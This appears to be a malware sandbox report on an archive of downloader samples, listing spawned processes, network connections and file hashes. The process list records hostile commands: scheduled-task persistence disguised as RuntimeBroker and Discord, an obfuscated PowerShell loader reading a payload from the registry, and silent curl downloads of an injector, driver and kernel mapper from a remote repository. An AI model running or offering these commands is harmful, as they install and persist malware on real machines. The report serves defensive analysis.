"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Svd8I7YPSQ3K.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3156 -s 640
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\yoc2BHO9dwWq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\12.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\12.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\js.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\js.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\nOayiyqfpA1O.bat" "
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\MK.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\MK.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\WEBDOWN.EXE
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/CALENDAR.EXE "C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\calendar.exe" RUN
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\list.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\list.exe"
C:\Users\Admin\AppData\Local\Temp\is-QI44L.tmp\list.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QI44L.tmp\list.tmp" /SL5="$F0172,3475144,54272,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\list.exe"
C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" pause video-minimizer_12122
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 pause video-minimizer_12122
C:\Users\Admin\AppData\Local\Video Minimizer 2.31\videominimizer.exe
"C:\Users\Admin\AppData\Local\Video Minimizer 2.31\videominimizer.exe" -i
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\tpeinf.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\tpeinf.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jGJjylnQwEBZ.bat" "
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "637624638424189338974532999-113107869720445793291801566231335163058-628035822"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Armanivenntii_crypted_EASY.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Armanivenntii_crypted_EASY.exe"
C:\Users\Admin\AppData\Local\Temp\863219876.exe
C:\Users\Admin\AppData\Local\Temp\863219876.exe
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Security.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Security.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\scancop.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\scancop.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\$77Security.exe
"C:\Users\Admin\AppData\Local\Temp\$77Security.exe"
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {DB923CB2-A348-4A97-9A63-743439534ACD} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PHItso8lBIkf.bat" "
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-643128098485438550-1038270920-20339524531173644753-755222011-1906680013624942674"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\loader.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\loader.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-482281963263682992-1791600313-22971689620367521210928758621245120239-265219107"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 52
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0c7ce964-fb27-45fc-8429-5a32a47e8a0b}
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareogfn.dll https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/SonyGamaManager.dll --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\injectorOld.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/injectorOld.exe --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\driver.sys https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/driver.sys --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\mapper.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/kdmapper_Release.exe --silent > nul 2>&1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\dwareinj.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/pclient.exe --silent > nul 2>&1
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vcA5Tv90K4FS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\6zrByAls3DvP.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sVmf8lqIKSUG.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\E1kCl8cXHof9.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\IQsQgJ63pmbf.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 123.ywxww.net | udp |
| CN | 60.191.208.187:820 | 123.ywxww.net | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| N/A | 127.0.0.1:49275 | | tcp |
| N/A | 127.0.0.1:49281 | | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| CN | 47.93.243.161:39124 | | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| IE | 52.142.124.215:80 | duck.com | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| IE | 52.142.124.215:80 | duck.com | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| US | 8.8.8.8:53 | duck.com | udp |
| IE | 52.142.124.215:443 | duck.com | tcp |
| US | 8.8.8.8:53 | duck.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| IE | 52.142.124.215:443 | duckduckgo.com | tcp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | improving.duckduckgo.com | udp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| IE | 52.142.124.215:443 | improving.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| IE | 20.223.54.233:443 | links.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | links.duckduckgo.com | udp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | duckduckgo.com | udp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 34.54.88.138:443 | www.virustotal.com | tcp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 34.54.88.138:443 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| FR | 142.250.179.67:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| FR | 142.250.179.67:443 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| FR | 172.217.18.195:443 | recaptcha.net | tcp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| FR | 172.217.18.195:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | www.virustotal.com | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| US | 8.8.8.8:53 | recaptcha.net | udp |
| FR | 172.217.20.164:443 | www.google.com | udp |
| RU | 188.119.66.185:443 | 188.119.66.185 | tcp |
| NL | 31.214.157.206:2024 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| NL | 104.99.233.208:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | ojang.pe.kr | udp |
| US | 8.8.8.8:53 | eveezueigohehla.co | udp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| KR | 119.194.226.67:80 | ojang.pe.kr | tcp |
| US | 8.8.8.8:53 | jtpdev.co.uk | udp |
| GB | 91.238.160.241:443 | jtpdev.co.uk | tcp |
| US | 34.102.78.64:9002 | 34.102.78.64 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | www.ojang.pe.kr | udp |
| ID | 103.123.98.86:80 | 103.123.98.86 | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| RU | 185.215.113.67:15206 | | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| CN | 183.57.21.131:8095 | | tcp |
| US | 8.8.8.8:53 | atten-supporse.biz | udp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| US | 104.21.32.1:443 | atten-supporse.biz | tcp |
| US | 8.8.8.8:53 | nudump.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | havocc.ddns.net | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| RU | 188.119.66.185:443 | 188.119.66.185 | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| NL | 31.214.157.206:2024 | | tcp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | otyt.ru | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | nudump.com | udp |
| N/A | 127.0.0.1:6000 | | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| DE | 23.197.127.21:443 | steamcommunity.com | tcp |
| HK | 192.252.183.228:2087 | 192.252.183.228 | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| VN | 103.211.201.109:6000 | | tcp |
| RU | 176.113.115.163:443 | 176.113.115.163 | tcp |
| RU | 185.215.113.67:15206 | | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| N/A | 127.0.0.1:6000 | | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| RU | 185.215.113.9:12617 | | tcp |
| CN | 61.154.0.139:9000 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| KR | 119.194.226.67:80 | www.ojang.pe.kr | tcp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| US | 8.8.8.8:53 | www.mva.by | udp |
| BY | 93.125.99.121:80 | www.mva.by | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | selltix.org | udp |
| US | 8.8.8.8:53 | c0al1t1onmatch.cyou | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | udp |
| CN | 159.75.57.35:443 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| CN | 117.146.200.209:40500 | | tcp |
| IR | 151.247.243.189:40500 | | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| VN | 103.211.201.109:6000 | | tcp |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| N/A | 127.0.0.1:6000 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| RU | 185.215.113.67:15206 | | tcp |
| VN | 103.211.201.109:6000 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| CN | 159.75.57.69:443 | sgz-1302338321.cos.ap-guangzhou.myqcloud.com | tcp |
| VN | 103.211.201.109:6000 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| RU | 188.119.66.185:443 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| N/A | 127.0.0.1:6000 | | tcp |
| RU | 185.215.113.67:15206 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| VN | 103.211.201.109:6000 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| VN | 103.211.201.109:6000 | | tcp |
| NL | 89.105.223.196:29862 | | tcp |
| VN | 103.211.201.109:6000 | | tcp |
Files
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders.zip
| MD5 | 94fe78dc42e3403d06477f995770733c |
| SHA1 | ea6ba4a14bab2a976d62ea7ddd4940ec90560586 |
| SHA256 | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267 |
| SHA512 | add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463.zip
| MD5 | 202786d1d9b71c375e6f940e6dd4828a |
| SHA1 | 7cad95faa33e92aceee3bcc809cd687bda650d74 |
| SHA256 | 45930e1ff487557dd242214c1e7d07294dbedfa7bc2cf712fae46d8d6b61de76 |
| SHA512 | de81012a38c1933a82cb39f1ac5261e7af8df80c8478ed540111fe84a6f150f0595889b0e087889894187559f61e1142d7e4971d05bceb737ed06f13726e7eae |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe
| MD5 | 2a94f3960c58c6e70826495f76d00b85 |
| SHA1 | e2a1a5641295f5ebf01a37ac1c170ac0814bb71a |
| SHA256 | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce |
| SHA512 | fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f |
memory/2700-12-0x0000000001180000-0x0000000001188000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab168F.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar16B1.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin
| MD5 | a7c16e8e81bade7872d9d2925a0bef47 |
| SHA1 | 3a39d4faa91d8d83e86dd327032a59a86df7674c |
| SHA256 | f4ddf75381010676b6f11e73ee956ae37ac07e89f2e61057959469d1a003181a |
| SHA512 | 0ee60effb3a8b80c28b90bb7f9021762249bb259a1d00d357fabf2079dfb846755332cdd42aeb8188a508ec41b36822ae7f1013767cbaa39fea686172ae04606 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin
